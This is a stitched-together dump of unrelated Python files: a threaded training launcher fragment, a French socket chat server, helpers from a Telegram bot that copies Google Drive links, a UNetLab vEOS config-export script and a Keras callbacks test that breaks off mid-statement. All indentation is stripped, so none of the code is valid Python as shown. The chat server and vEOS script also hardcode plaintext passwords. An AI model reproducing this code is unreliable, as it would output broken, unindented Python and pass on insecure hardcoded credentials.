worker_threads = []
for worker in workers:
worker_work = lambda: worker.work(max_episode_length,gamma,sess,coord,saver)
t = threading.Thread(target=(worker_work))
t.start()
sleep(0.5)
worker_threads.append(t)
coord.join(worker_threads)
|
Serveur.py
|
import socket
import threading
import errno
# Connection Data
host = '192.168.1.62'
port = 55500
# Starting Server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
# Lists For Clients and Their Nicknames
clients = []
nicknames = []
def close():
server.close()
# Sending Messages To All Connected Clients
def broadcast(message):
for client in clients:
client.send(message)
# Receives messages from a client and broadcasts them
def handle(client):
while True:
try:
nickname = nicknames[clients.index(client)]
# Broadcasting Messages
message = client.recv(1024)
broadcast(message)
except:
if client in clients:
# Removing And Closing Clients
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast('{} a quitté la salle !\n'.format(nickname).encode())
nicknames.remove(nickname)
break
# Receiving / Listening Function
def receive():
global server
while True:
try:
# Accept Connection
client, address = server.accept()
print("Connecté avec : {}".format(str(address)))
# Request And Store Nickname
client.send('NICK'.encode())
nickname = client.recv(1024).decode()
if nickname == 'admin':
client.send('PASS'.encode())
password = client.recv(1024).decode()
if password != 'adminpass':
client.send('REFUSE'.encode())
client.close()
continue
nicknames.append(nickname)
clients.append(client)
# Print And Broadcast Nickname
print("Pseudo : {}".format(nickname))
broadcast("{} a rejoint !\n".format(nickname).encode())
# Start Handling Thread For Client
thread = threading.Thread(target=handle, args=(client,))
thread.start()
except OSError as ex:
if ex.errno in (errno.EBADF, errno.EINVAL):
break
raise
except KeyboardInterrupt:
close()
print('Le serveur a fermé')
def write():
while True:
message = input('')
if message == 'print clients':
print(clients)
receive()
|
get_functions.py
|
import logging, re, json, requests
from utils import (
load,
messages as _msg,
restricted as _r,
get_set as _set,
task_box as _box,
task_payload as _payload,
)
from workflow import copy_workflow as _copy
from utils.load import _lang, _text
from telegram.ext import ConversationHandler
from drive.gdrive import GoogleDrive as _gd
from telegram import ParseMode
from threading import Thread
from utils.load import ns
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
SET_FAV_MULTI, CHOOSE_MODE, GET_LINK, IS_COVER_QUICK, GET_DST = range(5)
regex1 = r"[-\w]{11,}"
regex2 = r"[-\w]"
judge_folder_len = [28, 33]
pick_quick = []
mode = ""
@_r.restricted
def cancel(update, context):
user = update.effective_user.first_name
logger.info("User %s canceled the conversation.", user)
update.effective_message.reply_text(
f"Bye! {update.effective_user.first_name} ," + _text[_lang]["cancel_msg"]
)
return ConversationHandler.END
def cook_to_id(get_share_link):
share_id_list = []
unsupported_type = []
share_id = ""
share_link = get_share_link.strip().replace(" ", "").splitlines()
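# Each line may be a full drive.google.com share link or a bare Drive
# file/folder id; anything else is collected as unsupported.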
for item in share_link:
if "drive.google.com" in item:
share_id = "".join(re.findall(regex1, item))
if len(share_id) <= 33:
share_id_list.append(share_id)
else:
unsupported_type.append({"type": "link", "value": item})
else:
if len(item) >= 11 and len(item) <= 33 and re.match(regex2, item):
share_id_list.append(item)
else:
unsupported_type.append({"type": "id", "value": item})
return share_id_list
def get_name_from_id(update, target_id, list_name):
cook_list = list(list_name)
if len(target_id) >= 11 and len(target_id) < 28:
cook_list.append(
{"G_type": "G_drive", "G_id": target_id, "G_name": load.all_drive[target_id],}
)
elif len(target_id) in judge_folder_len:
cook_list.append(
{
"G_type": "G_Folder",
"G_id": target_id,
"G_name": _gd().file_get_name(file_id=target_id),
}
)
else:
update.effective_message.reply_text(_msg.get_fav_len_invaild(_lang, target_id))
return ConversationHandler.END
return cook_list
def insert_to_db_quick(pick_quick, update):
is_quick = {"_id": "fav_quick"}
is_quick_cur = load.fav_col.find(is_quick)
if list(is_quick_cur) == []:
for item in pick_quick:
item["_id"] = "fav_quick"
load.fav_col.insert_one(item)
update.effective_message.reply_text(
_text[_lang]["insert_quick_success"], parse_mode=ParseMode.MARKDOWN_V2
)
return ConversationHandler.END
else:
status = "is_cover"
return status
def modify_quick_in_db(update, context):
pick_quick = _set.pick_quick
for item in pick_quick:
load.fav_col.update({"_id": "fav_quick"}, item, upsert=True)
update.effective_message.reply_text(
_text[_lang]["modify_quick_success"], parse_mode=ParseMode.MARKDOWN_V2
)
return ConversationHandler.END
def delete_in_db_quick():
load.fav_col.delete_one({"_id": "fav_quick"})
return
def delete_in_db(delete_request):
load.fav_col.delete_one(delete_request)
return
def get_share_link(update, context):
get_share_link = update.effective_message.text
tmp_task_list = []
src_name_list = []
src_id_list = cook_to_id(get_share_link)
is_quick = {"_id": "fav_quick"}
is_quick_cur = load.fav_col.find(is_quick)
is_dstinfo = _copy.current_dst_info
if is_dstinfo != "":
dstinfo = is_dstinfo.split("id+name")
dst_id = dstinfo[0]
dst_name = dstinfo[1]
else:
for doc in is_quick_cur:
dst_id = doc["G_id"]
dst_name = doc["G_name"]
for item in src_id_list:
src_name_list = get_name_from_id(update, item, list_name=src_name_list)
for item in src_name_list:
src_id = item["G_id"]
src_name = item["G_name"]
tmp_task_list.append(
{
"mode_type": mode,
"src_id": src_id,
"src_name": src_name,
"dst_id": dst_id,
"dst_name": dst_name,
"chat_id": update.message.chat_id,
"raw_message_id": update.message.message_id,
}
)
Thread(target=_box.cook_task_to_db, args=(update, context, tmp_task_list)).start()
_copy.current_dst_info = ""
return ConversationHandler.END
def _version(update, context):
update.message.reply_text(
"Welcome to use iCopy Telegram BOT\n\n"
f"Current Version : {load._version}\n\n"
f"Latest Version : {_get_ver()}"
)
def _get_ver():
_url = "https://api.github.com/repos/fxxkrlab/iCopy/releases"
_r_ver = requests.get(_url).json()
_latest_ver = _r_ver[0]["tag_name"]
return _latest_ver
def taskill(update, context):
ns.x = 1
def check_restart(bot):
check_restart = load.db_counters.find_one({"_id": "is_restart"})
chat_id = check_restart["chat_id"]
message_id = check_restart["message_id"]
load.db_counters.update_one({"_id": "is_restart"}, {"$set": {"status": 0,}}, True)
bot.edit_message_text(
chat_id=chat_id, message_id=message_id, text=_text[_lang]["restart_success"]
)
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
|
config_veos.py
|
#!/usr/bin/env python3
# scripts/config_veos.py
#
# Import/Export script for vEOS.
#
# @author Andrea Dainese <andrea.dainese@gmail.com>
# @copyright 2014-2016 Andrea Dainese
# @license BSD-3-Clause https://github.com/dainok/unetlab/blob/master/LICENSE
# @link http://www.unetlab.com/
# @version 20160719
import getopt, multiprocessing, os, pexpect, re, sys, time
username = 'admin'
password = 'password'
secret = 'password'
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
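# timeout bounds the whole import/export run: the worker process spawned at
# the bottom of this file is terminated once it expires.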
def node_login(handler):
# Send an empty line, and wait for the login prompt
i = -1
while i == -1:
try:
handler.sendline('\r\n')
i = handler.expect([
'login:',
'\(config',
'>',
'#'], timeout = 5)
except:
i = -1
if i == 0:
# Need to send username and password
handler.sendline(username)
try:
j = handler.expect(['#', 'Password:', '>'], timeout = expctimeout)
except:
print('ERROR: error waiting for ["#", "Password:"] prompt.')
node_quit(handler)
return False
if j == 0:
# Nothing to do
return True
elif j == 1:
# Need to provide password
handler.sendline(password)
try:
k = handler.expect(['>', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for [">", "#"] prompt.')
node_quit(handler)
return False
if k == 0:
handler.sendline('enable')
try:
l = handler.expect(['Password', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for ["Password", "#"] prompt.')
node_quit(handler)
return False
if l == 0:
# Secret password required
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif l == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif k == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif j == 2:
handler.sendline('enable')
try:
l = handler.expect(['Password', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for ["Password", "#"] prompt.')
node_quit(handler)
return False
if l == 0:
# Secret password required
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif l == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
else:
# Unexpected output
node_quit(handler)
return False
elif i == 1:
# Config mode detected, need to exit
handler.sendline('end')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif i == 2:
# Need higher privilege
handler.sendline('enable')
try:
j = handler.expect(['Password:', '#'])
except:
print('ERROR: error waiting for ["Password:", "#"] prompt.')
node_quit(handler)
return False
if j == 0:
# Need to provide secret
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif j == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif i == 3:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
def node_quit(handler):
if handler.isalive() == True:
handler.sendline('quit\n')
handler.close()
def config_get(handler):
# Clearing all "expect" buffer
while True:
try:
handler.expect('#', timeout = 0.1)
except:
break
# Disable paging
handler.sendline('terminal length 0')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
# Getting the config
handler.sendline('more system:running-config')
try:
handler.expect('#', timeout = longtimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
config = handler.before.decode()
# Manipulating the config
config = re.sub('\r', '', config, flags=re.DOTALL) # Unix style
config = re.sub('.*more system:running-config\n', '', config, flags=re.DOTALL) # Header
config = re.sub('!\nend.*', '!\nend\n', config, flags=re.DOTALL) # Footer
return config
def config_put(handler):
while True:
try:
i = handler.expect('login:', timeout)
except:
return False
return True
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]))
print('Standard Options:')
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File')
print('-p <n> *Console port')
print('-t <n> Timeout (default = %i)' %(timeout))
print('* Mandatory option')
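# Example invocation (hypothetical port/file values):
#   config_veos.py -a get -p 32769 -f /tmp/veos_startup.cfg -t 120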
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, filename, port):
try:
# Connect to the device
tmp = conntimeout
while (tmp > 0):
handler = pexpect.spawn('telnet 127.0.0.1 %i' %(port))
time.sleep(0.1)
tmp = tmp - 0.1
if handler.isalive() == True:
break
if (handler.isalive() != True):
print('ERROR: cannot connect to port "%i".' %(port))
node_quit(handler)
sys.exit(1)
if action == 'get':
# Login to the device and get a privileged prompt
rc = node_login(handler)
if rc != True:
print('ERROR: failed to login.')
node_quit(handler)
sys.exit(1)
config = config_get(handler)
if config in [False, None]:
print('ERROR: failed to retrieve config.')
node_quit(handler)
sys.exit(1)
try:
fd = open(filename, 'a')
fd.write(config)
fd.close()
except:
print('ERROR: cannot write config to file.')
node_quit(handler)
sys.exit(1)
node_quit(handler)
elif action == 'put':
rc = config_put(handler)
if rc != True:
print('ERROR: failed to push config.')
node_quit(handler)
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
node_quit(handler)
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:p:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-p', '--port'):
try:
port = int(a)
except:
port = -1
elif o in ('-t', '--timeout'):
try:
timeout = int(a)
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action == None or port == None or filename == None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if port < 0:
usage()
print('ERROR: port must be 32768 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout * 1000
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, port))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from unittest import mock
from absl.testing import parameterized
import keras
from keras.callbacks import BackupAndRestore
from keras.callbacks import BackupAndRestoreExperimental
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizers import learning_rate_schedule
from keras.optimizers.optimizer_v2 import gradient_descent
from keras.testing_infra import test_combinations
from keras.testing_infra import test_utils
from keras.utils import io_utils
from keras.utils import np_utils
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow.python.platform import tf_logging as logging
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
CALLBACK_HOOKS = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of times each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
for method_name in CALLBACK_HOOKS:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
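# Illustrative use: pass a Counter() instance via `callbacks=[...]` to fit,
# evaluate or predict and inspect counter.method_counts afterwards, as the
# tests below do.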
class CallAllHooks(keras.callbacks.Callback):
"""A callback that calls self._run for all hooks"""
def __init__(self):
for method_name in CALLBACK_HOOKS:
setattr(self, method_name, self._run)
def _run(self, *args, logs=None):
raise NotImplementedError
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
class CallbackCountsTest(test_combinations.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = test_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=test_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test_combinations.TestCase):
def _get_model(self, input_shape=None, additional_metrics=None):
additional_metrics = additional_metrics or []
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = test_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] +
additional_metrics,
run_eagerly=test_utils.should_run_eagerly())
return model
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
def test_progbar_logging_with_stateful_metrics(self):
class AddAllOnes(keras.metrics.Metric):
"""A simple metric that adds all the ones in `y_true`."""
def __init__(self, name='add_all_ones', **kwargs):
super(AddAllOnes, self).__init__(name=name, **kwargs)
self.total = self.add_weight(name='total', initializer='zeros')
def update_state(self, y_true, y_pred, sample_weight=None):
self.total.assign_add(
tf.cast(tf.reduce_sum(y_true), dtype=tf.float32))
def result(self):
return self.total
x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float)
y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0],
[0, 0]])
# There are 7 ones in total in `y_train` after two batches.
expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False)
self.assertRegex(printed.contents(), expected_log)
# When not executing eagerly, `model.evaluate` does not have the metrics
# results printed.
if tf.executing_eagerly():
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.evaluate(x_train, y_train, verbose=1, batch_size=4)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_all_keras_modes
def test_trivial_backup_restore(self):
if test_utils.should_run_eagerly():
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk])
def test_backup_restore_train_counter(self):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when eager execution is enabled')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
logging.info(f'counter: {model._train_counter}')
if epoch == 5 or epoch == 12:
raise RuntimeError('Interruption')
log_dir = self.get_temp_dir()
# The following asserts that the train counter is fault tolerant.
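# (The 10 training samples fit in one batch per epoch with the default batch
# size, so the counter is expected to read 6 and then 13 after the two
# interruptions below.)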
self.assertEqual(model._train_counter.numpy(), 0)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 6)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 13)
def _test_backup_and_restore_callback_with(self, cls):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when eager execution is enabled')
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
if epoch == 15:
raise RuntimeError('Interruption')
model = keras.Sequential([keras.layers.Dense(10)])
optimizer = gradient_descent.SGD()
model.compile(optimizer, loss='mse')
x = tf.random.uniform((24, 10))
y = tf.random.uniform((24,))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).repeat().batch(2)
backup_callback = cls(backup_dir=self.get_temp_dir())
try:
model.fit(
dataset,
epochs=20,
steps_per_epoch=5,
callbacks=[backup_callback, InterruptingCallback()])
except RuntimeError:
logging.warning('***Handling interruption***')
# This continues at the epoch where it left off.
model.fit(
dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback])
def test_experimental_backup_and_restore(self):
"""Ensure the legacy endpoint of `BackupAndRestore` gives warning."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestoreExperimental)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
def test_backup_and_restore(self):
"""Ensure the public endpoint of `BackupAndRestore` is working."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestore)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertNotIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@test_combinations.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=test_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@test_combinations.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=test_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@test_combinations.run_with_all_model_types(exclude_models='functional')
@test_combinations.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@test_combinations.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
model_type = test_utils.get_model_type()
if model_type == 'subclass':
return # Skip test since subclassed models cannot be saved in .h5 format.
if not tf.__internal__.tf2.enabled():
self.skipTest('Checkpoint callback only available in v2.')
layers = [
